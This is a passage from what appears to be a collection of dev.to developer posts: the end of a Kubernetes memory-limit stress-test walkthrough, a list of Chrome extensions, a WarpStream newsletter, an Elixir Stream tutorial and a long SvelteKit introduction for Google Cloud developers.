STATUS RESTARTS AGE coredns-7db6d8ff4d-bftnd 1/1 Running 1 (9d ago) 10d coredns-7db6d8ff4d-zs54d 1/1 Running 1 (9d ago) 10d etcd-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kindnet-fbwgj 1/1 Running 1 (9d ago) 10d kindnet-hxb7v 1/1 Running 1 (9d ago) 10d kindnet-kh5s6 1/1 Running 1 (9d ago) 10d kube-apiserver-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kube-controller-manager-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d kube-proxy-42h2f 1/1 Running 1 (9d ago) 10d kube-proxy-dhzrs 1/1 Running 1 (9d ago) 10d kube-proxy-rlzwk 1/1 Running 1 (9d ago) 10d kube-scheduler-lucky-luke-control-plane 1/1 Running 1 (9d ago) 10d metrics-server-55677cdb4c-c826z 1/1 Running 0 9m54s ``` - Let's see how much resources the nodes and pods are consume ```console root@localhost:~# kubectl top nodes NAME CPU(cores) CPU% MEMORY(bytes) MEMORY% lucky-luke-control-plane 80m 4% 601Mi 15% lucky-luke-worker 19m 0% 213Mi 5% lucky-luke-worker2 18m 0% 139Mi 3% root@localhost:~# kubectl top pods -n kube-system NAME CPU(cores) MEMORY(bytes) coredns-7db6d8ff4d-bftnd 1m 15Mi coredns-7db6d8ff4d-zs54d 1m 16Mi etcd-lucky-luke-control-plane 13m 45Mi kindnet-fbwgj 1m 14Mi kindnet-hxb7v 1m 13Mi kindnet-kh5s6 1m 13Mi kube-apiserver-lucky-luke-control-plane 37m 224Mi kube-controller-manager-lucky-luke-control-plane 10m 54Mi kube-proxy-42h2f 1m 17Mi kube-proxy-dhzrs 1m 18Mi kube-proxy-rlzwk 1m 17Mi kube-scheduler-lucky-luke-control-plane 2m 24Mi metrics-server-55677cdb4c-c826z 3m 19Mi ``` We can make some stress test for our cluster in new namespace ```console root@localhost:~# kubectl create ns mem-example namespace/mem-example created ``` - Sample 1 for exceeding available memory ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo namespace: mem-example spec: containers: - name: memory-demo-ctr image: polinux/stress resources: requests: memory: "100Mi" limits: memory: "200Mi" command: ["stress"] args: ["--vm", "1", "--vm-bytes", "150M", "--vm-hang", "1"] ``` - Sample 2 ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo-2 namespace: mem-example spec: containers: - name: memory-demo-2-ctr image: polinux/stress resources: requests: memory: "50Mi" limits: memory: "100Mi" 
command: ["stress"] args: ["--vm", "1", "--vm-bytes", "250M", "--vm-hang", "1"] ``` - Apply the 2 yaml files and see the result: ```console root@localhost:~# kubectl get pod -n mem-example NAME READY STATUS RESTARTS AGE memory-demo 1/1 Running 0 4m25s memory-demo-2 0/1 OOMKilled 3 (31s ago) 52s ``` We can see the error `OOMKilled` for the second pod because it exceeds the memory limit. - Sample 3 ```yaml apiVersion: v1 kind: Pod metadata: name: memory-demo-3 namespace: mem-example spec: containers: - name: memory-demo-3-ctr image: polinux/stress resources: requests: memory: "1000Gi" limits: memory: "1000Gi" command: ["stress"] args: ["--vm", "1", "--vm-bytes", "150M", "--vm-hang", "1"] ``` - Let's see the status of our pods: ```console root@localhost:~# kubectl create -f mem3-request.yaml pod/memory-demo-3 created root@localhost:~# kubectl get pod -n mem-example NAME READY STATUS RESTARTS AGE memory-demo 1/1 Running 0 17m memory-demo-2 0/1 CrashLoopBackOff 7 (3m ago) 14m memory-demo-3 0/1 Pending 0 20s ``` - Error message of the pod in `Pending` status is `Insufficient memory`: ``` Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedScheduling 86s default-scheduler 0/3 nodes are available: 1 Insufficient memory, 1 node(s) had untolerated taint {gpu: true}, 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }. preemption: 0/3 nodes are available: 1 No preemption victims found for incoming pod, 2 Preemption is not helpful for scheduling. ```
sina14
1,918,908
Top Free Chrome Extensions You Need to Download Today
In today's digital age, having the right tools can make your online experience more productive and...
0
2024-07-15T12:04:31
https://dev.to/vishnusatheesh/top-free-chrome-extensions-you-need-to-download-today-486k
webdev, beginners, tutorial, productivity
In today's digital age, having the right tools can make your online experience more productive and enjoyable. Whether you're a student, professional, or casual web user, Chrome extensions can help. With so many options, it can be hard to find the best ones. That's why we've made a list of must-have free Chrome extensions. These tools will boost your efficiency, improve security, and let you customize your browser. Read on to find out which Chrome extensions you should download today! ## Night Eye Activate the dark mode option in any website that you can imagine. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mfsbaqusqmf7k4k2iqmj.png) ## BuiltWith This Chrome Extension lets you find out what a website is built with by a simple click! ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3ye1pjkylnam8ybettxc.png) ## Color Picker Pick colors from web pages with Eyedropper. Color picker, gradient generator, color palette. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0hn3m688doi0ct9ys0iz.png) ## Go Full Page The simplest way to take a full page screenshot of your current browser window. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xu4het2hmpxkd142qlb5.png) ## WhatFont Identify any fonts on web pages, with one simple click. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/azfnd5cxbqs6lo3ml9oz.png) ## CSS Pepper No more digging in a code. Inspect styles in simple, well-organized & beautiful way. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cr4vbevvxtbxqda9frxx.png) ## Mobile Simulator Smartphone and tablet simulator on computer with several models to test mobile responsive websites. ![chrome extensions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3hy8n0eyyd9wypm9uext.png) The right Chrome extensions can greatly enhance your online experience, making your browsing more efficient, secure, and enjoyable. The must-have free Chrome extensions we've highlighted are essential tools that cater to a wide range of needs, from productivity to customization. By downloading and utilizing these extensions, you'll be well-equipped to navigate the digital world with ease and efficiency. So, don't wait—explore these extensions today and transform the way you use your browser!
vishnusatheesh
1,918,991
WarpStream Newsletter #4: Data Pipelines, Zero Disks, BYOC and More
Welcome to the fourth issue of the WarpStream newsletter. A lot has happened since our last...
0
2024-07-15T14:09:42
https://dev.to/warpstream/warpstream-newsletter-4-data-pipelines-zero-disks-byoc-and-more-2ded
dataengineering, apachekafka, datastreaming, warpstream
---
title: WarpStream Newsletter #4: Data Pipelines, Zero Disks, BYOC and More
published: true
date: 2024-07-10 17:20:40 UTC
tags: dataengineering,apachekafka,datastreaming,warpstream
canonical_url:
---

Welcome to the fourth issue of the WarpStream newsletter. A lot has happened since our last newsletter: we’ve released five new blogs, made a bunch of product updates, and added new social channels (like [Facebook](https://www.facebook.com/warpstream) and [YouTube](https://www.youtube.com/@warpstreamlabs)). Connect with us on social media and other platforms to stay updated via the links in the social footer at the bottom of this email.

### Lots of New Blog Posts

### [Introducing WarpStream Managed Data Pipelines for BYOC clusters](https://www.warpstream.com/blog/introducing-warpstream-managed-data-pipelines-for-byoc-clusters)

For WarpStream BYOC clusters, Managed Data Pipelines provide a fully-managed SaaS user experience for [Bento](https://warpstreamlabs.github.io/bento/), a lightweight stream processing framework that offers much of the functionality of Kafka Connect without sacrificing any of the cost benefits, data sovereignty, or deployment flexibility of the BYOC deployment model, and comes with version control.

![](https://cdn-images-1.medium.com/max/1024/0*xFIGBzfM7w1KJSWm.png)

### [Pixel Federation Powers Mobile Analytics Platform with WarpStream, saves 83% over MSK](https://www.warpstream.com/blog/pixelfederation-powers-mobile-analytics-platform-with-warpstream)

Pixel Federation’s mobile games have millions of users, so you can imagine how many events and Kafka topics they have. By swapping MSK for WarpStream, they not only drastically reduced their costs, but were able to ditch complex VPC peering in favor of simpler agent groups.

![](https://cdn-images-1.medium.com/max/1024/0*tMPR-Mf4pImJDw0J.png)

**Interested in Learning More About WarpStream?**

[**Book a call**](https://calendly.com/d/3x5-79z-zc6/warpstream-demo-45-minutes)

### [Zero Disks is Better (for Kafka)](https://www.warpstream.com/blog/zero-disks-is-better-for-kafka)

In a prior blog, we discussed how [tiered storage won’t fix Kafka](https://www.warpstream.com/blog/tiered-storage-wont-fix-kafka). The end goal is not some disks but zero disks. We cover how WarpStream’s Zero Disk Architecture (ZDA) allows you to do things like trivial or dead-simple auto-scaling of Kafka brokers (“agents” in WarpStream terminology), isolate workloads with agent groups, and easily run your entire data pipeline in your virtual private cloud (VPC) without the need for custom code or additional services.

![](https://cdn-images-1.medium.com/max/1024/0*XMsemAcHrhpXUBiW.png)

### [Secure by default: How WarpStream’s BYOC deployment model secures the most sensitive workloads](https://www.warpstream.com/blog/secure-by-default-how-warpstreams-byoc-deployment-model-secures-the-most-sensitive-workloads)

WarpStream’s BYOC model is a hybrid approach that balances the two common cloud deployment models (fully self-managed and fully hosted SaaS). By splitting the software into discrete data and control planes, it ensures data privacy and sovereignty, compliance, cost optimization, and control.
![](https://cdn-images-1.medium.com/max/1024/0*reNkpam00xifWR6F.png)

**Try WarpStream With $400 in Free Credits**

[**Get Started For Free**](https://console.warpstream.com/signup)

### [Multiple Regions, Single Pane of Glass](https://www.warpstream.com/blog/multiple-regions-single-pane-of-glass)

A common problem when building infrastructure-as-a-service products is the need to provide highly available and isolated resources in many different regions while also having the overall product present as a “single pane of glass” to end-users. We review the options available to solve this and what we ultimately used (push-based replication).

![](https://cdn-images-1.medium.com/max/1024/0*WAIyN6yCDVuIKKnj.png)

### Recent Product Updates

### [Managed Data Pipelines](https://docs.warpstream.com/warpstream/configuration/bento)

BYOC customers can now use Managed Data Pipelines. These combine the power of WarpStream’s control plane with [Bento](https://warpstreamlabs.github.io/bento/), an open-source stream processing platform. This provides much of the same functionality as Kafka Connect and additional stream processing functionality like single message transforms, aggregations, multiplexing, enrichments, and native support for WebAssembly (WASM).

Pipelines run in your VPC and on your VMs, and data is processed in your buckets. WarpStream has zero access to this data. WarpStream provides a helpful UI for creating and editing pipelines, the ability to pause and resume pipelines dynamically, and version control.

### [Lots of New Metrics](https://docs.warpstream.com/warpstream/overview/change-log)

We’ve added new metrics (and deprecated unnecessary ones) with nearly every release. We’ve recapped some of these new metrics below. You can check out [our official changelog](https://docs.warpstream.com/warpstream/overview/change-log) to get the full list.

- **warpstream\_consumer\_group\_generation\_id** = Uses the consumer\_group tag. This metric indicates the generation number of the consumer group, incrementing by one with each rebalance. It serves as an effective indicator for detecting occurrences of rebalances.
- **warpstream\_agent\_kafka\_fetch\_uncompressed\_bytes** = Tracks the total uncompressed bytes fetched, replacing the warpstream\_agent\_kafka\_fetch\_bytes\_sent metric.

### Coming Soon: Kafka Transactions

As we announced in our previous newsletter, the team is working on building in support for Kafka Transactions and expects to finish this work soon. If you want to use WarpStream for a workload requiring Transactions, please [contact us](https://www.warpstream.com/contact-us)! We would love to chat.

[**Try WarpStream With $400 in Free Credits**](https://console.warpstream.com/signup)

WarpStream is free to try. After you create your account, it will be loaded with $400 in free credits so you can test how easy it is to set up and use WarpStream.

[**Get Started For Free**](https://campaigns-events.was-1.sendpdr.com/track/link/v2_y10xn4ev41/9q67kt2pd8uylyuzfmulr7km0/v2_2nyq2boq67)
warpstream
1,919,089
Elixir Stream - The way to save resource
Intro When coming to Elixir, almost all of us use Enum (or for) a lot. Enum with the pipe (|&gt;) is...
0
2024-07-16T13:23:56
https://dev.to/manhvanvu/elixir-stream-the-way-to-save-resource-2ilk
## Intro

When coming to Elixir, almost all of us use `Enum` (or `for`) a lot. `Enum` with the pipe (`|>`) is a great couple, and code written this way is easy and clean. But we run into trouble when we process a big list or a file, for example: all the data is processed and passed on together to the next function, and this consumes a lot of memory.

For this kind of trouble Elixir provides `Stream`. In this topic we will go through the `Stream` module and see how it processes data.

## How it works

For example, if we need to process a large data set with `Enum`:

```Elixir
1..10_000
|> Enum.map(fn n -> {n, n} end)
|> Enum.map(fn {index, n} ->
  case rem(index, 2) do
    0 -> {index, n * n}
    _ -> {index, n + 1}
  end
end)
|> Enum.filter(fn {_, n} -> n > 1_000 and n < 10_000 end)
```

As this code shows, `Enum` always builds a full data list and transfers it to the next `Enum` function. This way of processing consumes a lot of memory for a large data set. It's good for small data sets only!

In this flow, the results are passed as full lists through the pipe:

![Enum](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0dn7x9zwnsaqcy2gnsb3.png)

With `Stream`, Elixir provides a different way. It transfers small pieces of data between the functions in the pipe. That is the lazy way of processing data. `Stream` is suitable for large data sets and for some specific ways of generating data, like events, I/O, loops, ...

Rewriting the example above with `Stream`, we have:

```Elixir
1..10_000
|> Stream.map(fn n -> {n, n} end)
|> Stream.map(fn {index, n} ->
  case rem(index, 2) do
    0 -> {index, n * n}
    _ -> {index, n + 1}
  end
end)
|> Stream.filter(fn {_, n} -> n > 1_000 and n < 10_000 end)
|> Enum.to_list()
```

In this example, `Stream` helps us save a lot of memory when transferring data between the stream functions. Only at the end of the pipe, for this example, do we need to construct the full (filtered) list. As a flow we have:

![Stream flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eqy2w4rq7s36qrco4wf6.png)

For each function in the stream, the data goes piece by piece (element by element) directly into the function. Of course, we can also group elements into chunks for better performance (batch processing).

## How to make a Stream

We have three ways to create a data source for a `Stream`:

The first: use a stream that is the output of another function, like `IO.stream/2`, `URI.query_decoder/1`, ...
The second: use an enumerable as the input of a stream, like a `List`, a `Range`, ...
The third: construct a stream ourselves with functions like `Stream.cycle/1`, `Stream.unfold/2`, `Stream.resource/3`, ...
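For instance, here is a minimal sketch of the third way, using `Stream.unfold/2` to build an infinite, lazily-generated sequence (Fibonacci numbers in this case):

```Elixir
# Each step emits `a` and carries {b, a + b} forward as the new state.
Stream.unfold({0, 1}, fn {a, b} -> {a, {b, a + b}} end)
|> Enum.take(8)
# => [0, 1, 1, 2, 3, 5, 8, 13]
```

Nothing is computed until `Enum.take/2` asks for elements, which is exactly the lazy behavior described above.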
manhvanvu
1,919,478
2.4 A gentle introduction to SvelteKit for Google Cloud developers
Introduction An earlier post in this series (A very gentle introduction to React)...
0
2024-07-16T10:23:16
https://dev.to/mjoycemilburn/24-a-very-gentle-introduction-to-sveltekit-for-google-cloud-developers-5cfj
sveltekit, javascript, googlecloud, beginners
--- title: "2.4 A gentle introduction to SvelteKit for Google Cloud developers" --- ### Introduction An earlier post in this series ([A very gentle introduction to React](https://dev.to/mjoycemilburn/23-a-students-guide-to-firebase-v9-a-very-gentle-introduction-to-reactjs-d67)) introduced readers to the excellent **React** framework system for developing webapps. **SvelteKit** is an alternative framework. How does it differ from React and is it any better? Functionally, I guess there's not that much difference. Most things you can do in React you can do in SvelteKit. And vice-versa. But when you get down to the details, many people feel that SvelteKit has the edge in terms of the ease with which you achieve your "reactive" goals. Svelte means "elegant" - and that's just what it is - a slender, highly adaptable and practical tool. Personally, I was attracted to SvelteKit because it also tends to push you towards server-side design - ie code that runs on your webapp's Cloud servers rather than in your user's web browser. This is ironic because it was the ease with which you could write and debug client-side code that originally got me hooked on webapp development. But then I discovered how reluctant indexing spiders are to invest effort in "hydrating" client-side code and realised I would just have to put more effort in here (see debugging in SvelteKit, below, to see what's entailed). But there are other reasons why you might consider using server-side code too. Here are a couple: * Once you start using third-party services such as Postmark (email despatch) or Paypal (payment collection), you'll realise that it's not a good idea to include their security codes in client-side code. If **you** can use the "inspector" to view these, so can anyone else. Code that runs server-side is inaccessible. * server-side code lives closer to your data and runs faster here than on a client laptop. SvelteKit makes it easy to play tunes on specifying which bits of your webapp are to run locally and which are to run remotely. * In some cases, pages may be entirely server-side rendered - if they contain only static information, Sveltekit will enable you to "pre-render" them. Pre-rendered pages are constructed at build time and downloaded as slabs of pure HTML. * Alternatively, they may be entirely client-side rendered. * Or yet again, they may run on both. A SvelteKit webapp aiming to deliver optimal response times may initially display just a server-sourced "placeholder" screen to get something, anything, visible (you get great credit with Google's indexing bots here, apparently). This is then "hydrated" by client-side code with information specific to the user-instance. Let's get down to something a bit more concrete. ## Routing in Svelte Externally, a Sveltekit webapp will look exactly like any classic browser application - a hierarchy of "pages" such as `mywebapp/dosomethingwithmyfiles`. It's like this because client users expect, and rely on this type of arrangement. But below the surface, a SvelteKit webapp delivers this arrangement in a totally different way to a React webapp. In React these pages are actually all parts of one giant slab of code and requests are routed thither by re-directs operating at the web interface (if that sentence doesn't make any sense to you, have a look at [Whats a 'Single-page' webapp?](https://dev.to/mjoycemilburn/61-polishing-your-firebase-webapp-whats-with-this-single-page-app-stuff-learn-about-react-routes-nb2)). 
SvelteKit achieves this by using your project structure to define your page structure. So, if you want to have a `mywebapp/dosomethingwithmyfiles` page, you need to have a folder named `dosomethingwithmyfiles` with a `+page.svelte` file inside it. Once this arrangement is in place, your deployed app delivers a separate physical page for each of its URLs. Here's a sample source folder structure for a SvelteKit project:

    myproject
    ├───src
    │   └───routes
    │       └───dosomethingwithmyfiles

Once you've installed SvelteKit (see [Svelte for New Developers](https://svelte.dev/blog/svelte-for-new-developers)), this structure will be augmented by a mass of complicated `config` files and `build` folders etc. But, for the present, the focus is on the `routes` folder. This is where you store your page code - and here is where you might start to wonder whether SvelteKit is the right thing for you. Take a tight grip now because this is where things get a bit complicated.

SvelteKit requires you to follow a **very strict naming convention** for the content of a page folder. Here's a list of the filenames that you might see in a `dosomethingwithmyfiles` folder:

* **dosomethingwithmyfiles/+page.svelte**. This file would contain the source for the code that displays the page for URL `myproject/dosomethingwithmyfiles` on the browser screen.

 Whoah - let that sink in for a moment. When you're working in your VSCode editor on a SvelteKit project with half a dozen different pages, your filebar may display half a dozen tabs all named `+page.svelte`. Confusing? Yes, I agree. At first sight, you might feel that this is simply unacceptable. But note that each `+page.svelte` file is qualified on the editor bar by the name of its folder owner, `dosomethingwithmyfiles`, or whatever. It's not so difficult to discipline yourself to check for the owner of a `+page.svelte` before you dive in and start editing. And once you've developed a SvelteKit project or two you'll begin to appreciate the value of the convention in declaring the *purpose* of the arrangement (as you'll see in a moment there are quite a few variations).

 While you're absorbing this shock, let me give you a bit of encouragement. **Within** a `+page.svelte` file you might expect to find the same sort of code you'd see in an equivalent React file - a mixture of exotic `useState` calls to manipulate page state, and JSX to 'react' to this and generate HTML. While a `+page.svelte` file certainly does the same job, it manages to discard the "exotic" bit and uses plain javascript and pure, undiluted HTML salted with a sprinkling of special keywords. You may find this refreshing.

 Here are a few more standard filenames you might find in a `dosomethingwithmyfiles` folder:

* **dosomethingwithmyfiles/+page.js**. This would contain the source for a file that delivers **data** to a `+page.svelte` file (ie, the equivalent of a React `useEffect`). Code here will run on the server when the page is initially loaded. Subsequently, if the page is re-referenced, the `+page.js` code runs in the browser with the advantages listed earlier.

 <p>&nbsp;</p>

 Interestingly, if you've suffered in the past from having to "re-program" your javascript brain whenever you switch between writing `Web API` code to run in the browser and `Node.js` style to run server-side in a Firebase function, you'll be delighted to hear that, in Sveltekit, the `Web API` version is now perfectly happy to run server-side as well.
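 To make this concrete, here's a minimal sketch of what such a `+page.js` file might contain (the `/api/myfiles` endpoint is an invented placeholder, not part of any real project):

```javascript
// src/routes/dosomethingwithmyfiles/+page.js
// SvelteKit calls this exported `load` function when the route is visited;
// whatever it returns is made available to the associated +page.svelte
export async function load({ fetch }) {
    const response = await fetch('/api/myfiles'); // illustrative URL only
    return { files: await response.json() };
}
```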
<p>&nbsp;</p> Naturally, you'll want to know just how you organise things so that data read by a `+page.js` file ends up in the associated `+page.svelte`. Let me say that, for the present, this arrives by SvelteKit magic. The exact mechanism will only become clear once I've described SvelteKit's arrangements for defining "reactive" variables. Hang onto your hat for now. <p>&nbsp;</p> * **dosomethingwithmyfiles/+page.server.js**. This is where you would place code that you want to run only on the server (typically for security or performance reasons). As mentioned earlier, you can request that this is pre-rendered and thus constructed at build-time. In this case, performance is simply startling. <p>&nbsp;</p> * **dosomethingwithmyfiles/+layout.svelte**. This is where you would place code that sets up those bits of a page common to a whole set of other pages - toolbar headers, for example. A `+layout.svelte` file applies to every child route and any sibling `+page.svelte`. You can nest layouts to arbitrary depth. Again, the precise arrangement for inserting the common layout into the recipient pages will be left for later - more Svelte magic. <p>&nbsp;</p> If a `+layout.svelte` page needs some data, it can have an attendant `+layout.server.js` file <p>&nbsp;</p> * **dosomethingwithmyfiles/+server.js**. This is where you would place code that you wanted to be available as an "API endpoint" via a parameterised URL such as `myProject/dosomethingwithmyfiles?type="pdf"`. I'll provide more details on this arrangement later. ### 'Reactive variables' and 'Reactive HTML' in SvelteKit By 'reactive variables' I mean data items that cause the browser page to re-render when they change. By 'reactive HTML' I mean HTML instrumented to make it respond to these changes. In React, you'll recall, reactive variables are declared using a `useState` expression that defines the variables as properties of a state object. The declaration also specifies initial property values and a function to change them. 
Here's an example - a React webapp that displays a popup that disappears when you click it:

```javascript
import React, { useState } from "react";

const [screenState, setScreenState] = useState({popupVisible: true,});

return (
    <div>
        <h1 style={{textAlign: "center"}}
            onClick = {() => {setScreenState({popupVisible: !screenState.popupVisible})}}>
            Main Page - Click to toggle popup
        </h1>
        {screenState.popupVisible &&
            <div style={{ textAlign: "center", marginLeft: "auto", marginRight: "auto", height: "2rem", width: "25rem", backgroundColor: "gainsboro" }}
                onClick = {() => {setScreenState({popupVisible: !screenState.popupVisible})}}>
                <h2> Popup Window - Click to Hide popup</h2>
            </div>
        }
    </div>
)
```

In Svelte (I'm now talking about the *language* as opposed to the *framework* in which it operates) you might achieve this effect in a `src/routes/demo/+page.svelte` file by simply declaring `popupVisible` as a javascript variable

```javascript
<script>
    let popupVisible = true;
</script>

<div>
    <h1 style="text-align: center" on:click={() => (popupVisible = !popupVisible)}>
        Main Page - Click to toggle popup
    </h1>
    {#if popupVisible}
        <div style="text-align: center; margin-left: auto; margin-right: auto; height: 2rem; width: 25rem; background-color: gainsboro"
            on:click={() => (popupVisible = !popupVisible)}
        >
            <h2>Popup Window - Click to Hide popup</h2>
        </div>
    {/if}
</div>
```

Here's a summary of the key differences:

* Svelte uses a standard Javascript `let` declaration to introduce state variables instead of the strange React `useState` expression
* Svelte uses a down to earth `#if 'logical expression'` keyword to replace the awkward JSX `{'logical expression' &&` syntax. This makes your code much more readable. Svelte also provides associated `else` and `each` keywords.
* Svelte uses plain CSS to define HTML classes rather than the perplexing JSX style objects (eg `{{textAlign: "center"}}`).

Note also that the `demo/+page.svelte` file defined above will run directly in the browser as `/demo`. To run the React version you would have to put some code into an associated `src/main.jsx` file to define the new route.

### Inputs: Local Functions, Actions and API endpoints

Keyboard input in React generally uses the following pattern:

```javascript
const [myState, setMyState] = useState({myProperty: "",});

function handleChange({ target }) {
    setMyState({ ...myState, [target.name]: target.value });
};

return (
    <input name="myProperty" value={myState.myProperty} onChange={handleChange} />
)
```

Here, an input labelled as "myProperty" fires a general-purpose `handleChange` function every time you press a key. In `handleChange` its value is extracted and applied to the page's state to trigger a re-render.

Svelte thinks this is too complicated and introduces a "bind" keyword to its input syntax. This automatically transmits changes to an associated state variable. A Svelte version of the above thus looks like this:

```javascript
<script>
    let myProperty = "";
</script>

<input bind:value={myProperty} />
```

The bind keyword is also used to enable you to create two-way communication between parent and child components. This is a powerful feature. An interesting feature of Svelte is that it encourages you to use forms and server-side processing for input handling.
Thus it's perfectly permissible in Svelte to launch a client-side function like this:

```javascript
<script>
    let myProperty = "";

    function commitChange() {
        // Use the global myProperty variable to update server storage
    }
</script>

<span>myProperty = </span><input bind:value={myProperty} />
<button on:click={commitChange}>Commit Change</button>
```

Svelte docs correctly insist that interactions like this are better handled by forms and server-side processing in a `+page.server.js` file. Here the validation and submission of the user input can be safely protected from the sort of interference possible in client-based code. Here also, any subsequent processing can be performed with maximum efficiency.

To implement this view, Svelte provides a neat automatic link between a form reading data on a `+page.svelte` and a function handling the processing of that data in the associated `+page.server.js` file. Here's an example:

```javascript
src/routes/login/+page.svelte

<form method="POST">
    <span>myProperty = </span><input name="myProperty">
    <button>Commit Change</button>
</form>

src/routes/login/+page.server.js

export const actions = {
    default: async (event) => {
        // TODO handle the processing for the input read by the form on +page.svelte
    }
};
```

Note that no Javascript has been used in the form - no "on click" or "on submit", for example. The linkage has been established entirely through "Svelte magic". In practice, of course, a `+page.svelte` file is likely to want to be the source of multiple "actions". See [Svelte Form Actions](https://kit.svelte.dev/docs/form-actions) for details of how Svelte manages this. (Note that Svelte docs are organised under two URLs: `kit.svelte.dev` for framework topics like routing and `svelte.dev` for elements of the language itself.)

Finally, to conclude this section, suppose you wanted users to be able to call on the service of an action by referencing it directly through a javascript "fetch" (or, at its simplest, by launching a parameterised url via the browser - eg `https://mySite/myPage?param1=3` etc). This is where you would use a `+server.js` file to create an API "endpoint" function. Firebase users might well use such an arrangement where they had previously used a Firebase function. Not the least advantage of this would be that testing and debugging could be done in the Sveltekit server rather than the Firebase emulator.

### Components

* 1-way bindings

Each `+page.svelte` file defines a component, and you mark variables declared here as "props" - ie make them accessible to "consumers" of the component - by adding the `export` keyword to their declarations. So, if you're still wondering how a `+page.svelte` file gets its data from `+page.server.js` - this is how it's done. A `+page.svelte` file wanting to receive "load" data from its `+page.server.js` (or `+page.js`) file just needs to put something like the following in its `<script>` section:

```
export let data
```

Svelte magic will then ensure that if the 'load' function exported by the `+page.server.js` file returns an object such as `{name: "Benny"}` then `+page.svelte` will find that `data.name` contains "Benny".

But suppose that the `+page.svelte` file wanted to reference its own child component. How would that child be configured and linked to its parent? Let's say that this child component needs parameters `param1` and `param2` to build its output.
It's usually most convenient to store the component in a `src/lib` folder - say `src/lib/MyComponent.svelte` - and its content might then look something like:

```javascript
<script>
    export let param1;
    export let param2;
</script>

... Svelte html referencing param1 and param2 ...
```

The parent `+page.svelte` could then engage the component like this:

```javascript
<script>
    import MyComponent from "$lib/MyComponent.svelte";

    let param1 = "Type A";
    let param2 = 10;
</script>

<h1> Component-Access Demo Page </h1>

<MyComponent {param1} {param2} />
```

This arrangement will be perfectly familiar if you've previously used React. Also, as with React, once the child component has received a parameter passed in this way, it's free to modify it at will - the parent will be oblivious of the change. This arrangement is known as a one-way binding.

Note the "$" shortcut used in the child component import declaration. Svelte works out the actual route automatically, saving you working out all the conventional "./" and "//" designators.

* 2-way bindings

Suppose the child component creates a form designed to serve both Create and Edit parents. In this case, it needs to be able to receive parameters supplying initial values for form elements and return the user inputs. Data is thus required to pass both down and up the component hierarchy. In React you might have used a Context here. Svelte provides several alternatives, each with different characteristics, but the simplest is a `bind:` keyword applied to the parameter references in the parent's component call.

Let's say we've created the following shared input layout in a `lib/MySharedInputPanel.svelte` file:

```javascript
<script>
    export let input1;
    export let input2;
</script>

<div>
    <span>Input1 value</span>
    <input type="text" bind:value={input1} />&nbsp;&nbsp;
    <span>Input2 value</span>
    <input type="text" bind:value={input2} />
</div>
```

This creates a default export for a MySharedInputPanel component that a `routes/editrecord/+page.svelte` file can import and use to build an edit 'form' for the named, exported inputs as follows:

```javascript
<script>
    import MySharedInputPanel from "$lib/MySharedInputPanel.svelte";

    let input1 = "Initial Text";
    let input2 = 3;
</script>

<h1>Edit Record</h1>
<div>
    <MySharedInputPanel bind:input1 bind:input2 />
    <p>Latest values: Input1 = {input1} : Input2 = {input2}</p>
</div>
```

If you try this out yourself, you'll see that the shared panel initially displays the input1 and input2 values specified in the edit record route and that the parent `editrecord/+page.svelte` view of these changes when new values are entered. This confirms that the route is automatically rerendering when changes occur. A `routes/createrecord/+page.svelte` could use the same form component to collect inputs and create a record.

Note that, for brevity, I've used neither the `<form>` nor `<label>` elements that good practices would require. My code also assumes that the parents and child use the same variable names. See Svelte's "component directive" docs for a more general version of the bind: syntax.

### Svelte `store`

Sometimes you'll find that you need a global state object to serve components that are not hierarchically related. Svelte `store` is designed to meet this need - and much more besides. A `store`, particularly a writable store (several variants exist), is an object with a `set()` method that allows you to set new values for its content. Why is this any different from good old Chrome `localStorage`?
Potential readers of the store register their interest via a subscribe() method that sets a callback function that notifies them whenever the store value changes - Svelte store is reactive!

I'll only describe the "writable" version of Svelte store here - the one that I, myself, have found most useful. In brief:

A writable store is created using the following code pattern:

```javascript
import { writable } from "svelte/store";

let myStoreContent = {myStoreField: "Welcome to SvelteStore"}
export const myStore = writable(myStoreContent);
```

Now, if a component (or, indeed, a regular JavaScript module) needs to know if anything changes in the store, it can register its interest by supplying a callback function with a `subscribe` command along the lines of the following:

```javascript
let currentMyStoreFieldValue;

myStore.subscribe((store) => {
    currentMyStoreFieldValue = store.myStoreField;
});
```

Note that, once you've created this arrangement, you never have to explicitly *read* your store; its current value remains available in your page's `currentMyStoreFieldValue` for the duration of a browser session.

A typical arrangement will be to use a `stores.js` file (usually positioned at the root of the src folder) to create a `store` object and then import this wherever it's needed. The javascript module system will ensure that the store is initialized the first time it is imported during the browser session.

To update the store's value you can use the `set()` method again, but it may often be more convenient to use Svelte store's `update()` method as this gives you access to the current value of the store. Check out Svelte's docs at [Writable Stores](https://learn.svelte.dev/tutorial/writable-stores) if you'd like to see an example (and much else besides).

### Debugging techniques for SvelteKit webapps

So, you've blasted your code through the myriad of shrieks and groans displayed by VSCode and Vite when they find errors such as undeclared variables and missing files. These are all usually easily fixed. But now you've got a webapp that runs - but all it does is sit and sulk. What now?

The first thing, of course, is to open the browser's Inspector and see what the Console tab offers - there's almost always something to get a handle on here. Oh dear - CORS, Permissions, or similar error. What now?

Debugging a SvelteKit webapp tends to be a bit more complicated than, say, a React codebase because so much of your code is likely to be running "server-side". If you've followed this series rigorously, you'll likely now be a world expert in debugging client-side code using the Browser's Inspector. This, above all else, makes my own coding life the purest pleasure. But when you try to set breakpoints in a SvelteKit `+page.server.js` file, you'll find that the browser won't let you.

Think about this for a moment. How can it? Code here runs either in the development server launched by npm run dev or in the live server where you've just deployed a package. This is just a black hole as far as the browser is concerned. So what do you do now?

